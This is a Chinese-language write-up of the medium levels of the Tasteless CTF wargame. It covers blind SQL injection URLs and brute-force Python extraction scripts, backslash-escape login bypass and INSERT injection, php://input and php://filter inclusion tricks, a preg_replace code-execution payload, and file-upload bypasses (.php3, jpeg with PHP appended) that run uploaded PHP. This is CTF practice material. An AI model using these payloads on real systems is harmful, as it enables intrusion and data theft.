Tasteless challenges medium WP
http://chall.tasteless.eu/
國外的一個靶場,感覺還行,做了下順便寫一下wp
hard部分沒做完,果然是我太菜了覺得不是很好做,以後再更吧
另外easy的Level 19- Sort it out!實在沒看懂啥意思,望知道的表哥告知我一下
medium
Level 1- Infiltration
http://chall.tasteless.eu/level1/index.php?dir=ASC
觀察URL應該能猜到後臺的SQL語句為
select * from id order by xx ASC;
其中order by id後面為可控點,利用正則和^運算觀察網頁回顯差別可得flag長度為32,應該是串md5
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp ‘^30$‘)
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp ‘^31$‘)
http://chall.tasteless.eu/level1/index.php?dir=^(select length( (select flag from level1_flag) ) regexp ‘^32$‘)
然後寫腳本猜解
1 import requests 2 3 chars=‘0123456789qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM‘ 4 5 def isTrue(p): 6 url="http://chall.tasteless.eu/level1/index.php?dir=^(select (select flag from level1_flag) regexp ‘^{}‘)".format(p) 7 print url 8 res=requests.get(url)9 if ‘date of birth. </p><p>3 : Many facts of‘ in res.text: 10 return True 11 else: 12 return False 13 14 15 length=32 16 p=‘‘ 17 for i in range(length): 18 for c in chars: 19 tp=p+c 20 if isTrue(tp): 21 p=tp 22 break 23 print p
參考:玩得一手好註入之order by排序篇
Level 3- Double Agent
1 <?php 2 highlight_file(‘index.php‘); 3 /* 4 view file: php.ini 5 so here is my hint: the included php.ini file is part of the configugartion file used on the server the bug was found. 6 so there will be something in it which enables you to solve this level, wont? 7 8 always be UP TO DATE! 9 10 hint enough, might just take you seconds to do?! 11 */ 12 error_reporting(0); 13 include(‘anti_rfi.php‘); //rfi is forbidden!!!!! 14 15 $inc = @$_GET[‘file‘]; 16 @require_once($inc); 17 ?>
用php://input直接就能執行任意代碼
Level 6- Too Easy
這個和第一個有點類似,但稍微麻煩一點,在這關裏過濾了一些字符,比如if,updatexml,extractvalue,*等,而且網頁回顯是隨機抽1到3條
測試多次後發現,可以利用除法,比如隨機出來的是id為1和2的數據,默認排序就是先1後2,如果都除以-1,那麽回顯順序就是反的,以此差異猜解數據
select xx regexp xx 的返回值是0或1,0-1=-1,1-1=0(除以0這裏好像不會有問題,其值為NULL)
同樣方法判斷出長度為32(32的時候回顯的才是升序,其他都是降序)
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp ‘^30$‘) -1 )
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp ‘^31$‘) -1 )
http://chall.tasteless.eu/level6/index.php?in=/( ( select length( (select flag from level6_flag) ) regexp ‘^32$‘) -1 )
然後寫腳本自動猜解,一個個字符比對速度很慢,可以改下算法,例如二分
1 import requests 2 import re 3 4 chars=‘0123456789qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM‘ 5 6 def isTrue(p): 7 url="http://chall.tasteless.eu/level6/index.php?in=/( ( select (select flag from level6_flag) regexp ‘^{}‘) -1 )".format(p) 8 print url 9 10 res=requests.get(url) 11 r=re.findall(r‘(\d) :‘,res.text) 12 count=len(r) 13 while count<2: 14 res=requests.get(url) 15 r=re.findall(r‘(\d) :‘,res.text) 16 count=len(r) 17 pass 18 if int(r[0])>int(r[1]): 19 return False 20 else: 21 return True 22 23 length=32 24 p=‘‘ 25 for i in range(length): 26 for c in chars: 27 tp=p+c 28 if isTrue(tp): 29 p=tp 30 break 31 print p
Level 7- Get Me Down
下載源碼後發現.htaccess中設置了會將jpeg文件當做php解析,index.php檢測了文件的MIME等,所以拿一張正常的jpeg圖片,尾部加上php代碼上傳即可運行
訪問上傳的圖片然後查看網頁源碼即得
Level 9- In My Dreams
1 <html> 2 <head> 3 <title>In My Dreams</title> 4 </head> 5 <body> 6 <p>Here is the <a href=‘index2.html‘>source</a>!</p> 7 </body> 8 </html> 9 <?php 10 //hi all! you may ask what to do here? its simple, just have a nice walk through these lines, then just call w_() 11 //and its done 12 $_k = @$_GET[‘magic‘]; //put the magic byte here :) 13 $_u=create_function(‘$_a_‘,‘foreach($_a_ as $_=>$__){$a[$_]=$__;}return @array_splice($a,1);‘); 14 $_u=@call_user_func($_u,@$_GET[‘argv‘]);function w_(){print‘Good job! flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX‘;}$_f=chr(112).chr(114).__CLASS__."\x65"."\x67"."_"; 15 $_function=create_function(‘$___,$_,$__‘,‘return(strcmp((($_^$__)|$___),123)==0)?1:0;‘); 16 ((int)$_function((int)$_u[0],(int)$_u[1],(int)$_u[2])>0)?0:printf("%s",die()); 17 $__=cosh;$___=$__[asinh(_)];$_t="\x31";$___.=$__[$_t+$_t+$_t];$___.=$__[$_t];$___++;$___++;$___++; 18 $_f.=substr(str_repeat("\x72",11),-3,1)."e";$_f_=metaphone(crc32(__DIR__).preg_replace("%^=(\?):*?[\sa-z*]*{\$}*?.[^\D]{1,}(\w|\s)$%sUi","${2}1,$1",crc32(__FILE__))); 19 @$_a.=__METHOD__."\x25".$___(@0+"@${$_t}"+~$_k+1*(5*20))."\x0";$_f.="pl"; 20 $_f.="ac"."\x65";@$_f("%.".$_a."%ixs","(string)$_u[3]()",‘ ‘);
這代碼看起來是真的惡心,但最終還是梳理出來了,期間的一些亂七八糟的運算,其實在後面使用某個變量之前用var_dump把這個變量輸出看看是啥,再替換成這個就行,全部替換一次應該看懂代碼就沒問題
然後目標是執行w_()這個函數,方法呢就是preg_replace的代碼執行,這個具體可以百度,但是這裏有點特殊啊,magic參數的構造我一直沒成功,就用burp跑了一下,最終發現0xCE這個字符剛好能觸發,所以最終payload
http://level9.tasteless.eu/index.php?magic=%ce&argv[0]=123&argv[1]=123&argv[2]=123&argv[3]=&argv[4]=w_
Level 10- Never Trust The Obvious
一個登錄框,沒有提示,能想到了只能是註入了,通常也都是SQl註入,但輸入單雙引號發現並未報錯,可能是後臺對引號進行了轉義
猜想後臺SQL語句是
SELECT * FROM users WHERE username=‘$user‘ and password=‘$pass‘
如果輸入單引號,則會被轉義,即如果輸入賬號 ‘ 密碼 x,語句為
SELECT * FROM users WHERE username=‘\‘‘ and password=‘x‘
那麽測試轉義符,發現報錯
那麽可以斷定後臺的處理邏輯確實是如此,而且\不在應當轉義的列表中,則當前的語句應該為
SELECT * FROM users WHERE username=‘\‘ and password=‘x‘
語句未閉合,當然報錯
然後即可構造payload
\
or 1#
SELECT * FROM users WHERE username=‘\‘ and password=‘or 1#‘
成功登陸
Level 11- Sjukdom
存在本地文件包含,直接包含那個文件,flag就在其中
http://level11.tasteless.eu/index.php?file=php://filter/read=convert.base64-encode/resource=config.easy.inc.php
hard難度還沒想出繞過方法,待更...
另外望解出的大佬告知
Level 15- Tournament
這個根據程序功能和hint基本能確定是SQL註入,但嘗試輸入單雙引號並未出錯,那麽肯定就是對引號進行了轉義,所以嘗試轉義符
雖然並未報錯,但顯示的信息肯定是不對的,至於為什麽會出現和上面一條一樣的消息,這裏不知道後臺處理邏輯我也不清楚,但可以斷定的是肯定這裏肯定出錯了,所以猜想後臺插入數據庫數據的語句為(代碼不完全符合,因為測試發現註入點只在name處有,text處處理應該更加嚴格)
1 <?php 2 $name=str_replace("‘","\‘",$_GET[‘name‘]); 3 $message=str_replace("‘","\‘",$_GET[‘message‘]); 4 $name=str_replace(‘"‘,‘\"‘,$name); 5 $message=str_replace(‘"‘,‘\"‘,$message); 6 $sql="INSERT INTO table_name (name,message) VALUES (‘".$name."‘,‘".$message."‘)"; 7 echo $sql;
代碼只把單雙引號轉義,但並未轉義轉義符,所以如果name處構造如下
title\‘,1111111)#
最後的語句即為
INSERT INTO table_name (name,message) VALUES (‘title\\‘,111111)#‘,‘x‘)
最後payload
title\‘,(select flag from level15_flag))#
Level 18- Extensions?
1 <html> 2 <head> 3 <title>Extensions?</title> 4 </head> 5 <body> 6 <p>source code: <a href="./index.php~">index.php~</a></p> 7 <br/> 8 <form action="index.php" method="post" enctype="multipart/form-data"> 9 <label for="file">Filename:</label> 10 <input type="file" name="file" id="file"><br> 11 <input type="submit" name="submit" value="Submit"> 12 </form> 13 <br /> 14 <?php 15 error_reporting(0); 16 17 $output = array (); 18 $errors = array (); 19 $savePath = "upload"; 20 21 if (isset ( $_FILES [‘file‘] ) && $_FILES ["file"] ["error"] == UPLOAD_ERR_OK) { 22 23 $fileName = $_FILES [‘file‘] [‘name‘]; 24 $fileSize = $_FILES [‘file‘] [‘size‘]; 25 $fileTemp = $_FILES [‘file‘] [‘tmp_name‘]; 26 $fileType = $_FILES["file"]["type"] ; 27 $fileExt = pathinfo ( $fileName, PATHINFO_EXTENSION ); 28 $fileExt = strtolower ( $fileExt ); 29 30 if (preg_match("/php$/i", $fileExt)) { 31 $errors [] = "Invalid File Extention"; 32 } 33 if ($fileSize > 800*1024) { 34 $errors [] = "File Too large"; 35 } 36 if (! is_writable ( $savePath )) { 37 $errors [] = "File Destination not writeable"; 38 } 39 40 $fileDst = $savePath . DIRECTORY_SEPARATOR . $fileName; 41 $filePrifix = basename ( $fileName, "." . $fileExt ); 42 43 44 if(file_exists($fileDst)) { 45 $errors [] = "Filename exists"; 46 } 47 48 49 if (count ( $errors ) == 0) { 50 if (@move_uploaded_file ( $fileTemp, $fileDst )) { 51 $output[‘Destination‘] = $fileDst; 52 } else { 53 $errors [] = "Error Saving File"; 54 } 55 } 56 57 if(count($errors) > 0) 58 { 59 echo "<h2>Upload Error</h2>" ; 60 foreach ($errors as $error){ 61 echo $error , "<br/>" ; 62 } 63 }else{ 64 echo "<h2>File Uploaded</h2>" ; 65 foreach ($output as $key => $value){ 66 echo $key . ": <a href=\"./$value\">" .$value , "</a><br/>" ; 67 } 68 } 69 } 70 ?> 71 </body> 72 </html>
代碼中的正則阻止了php後綴的文件,直接上傳php後綴的文件肯定不行,不過
Apache 配置中會有
.+.ph(p[345]?|t|tml)
此類的正則表達式,文件名滿足即可被當做php解析,也就是說php3,php4,php5,pht,phtml都是可以被解析的
所以上傳一個PHP文件,後綴名為php3,即可被解析,可以上傳一句話,或者直接如下
1 <?php 2 var_dump(scandir("..")); 3 echo file_get_contents("../D4tFl4g.php"); 4 ?>
查看源碼即得flag
Tasteless challenges medium WP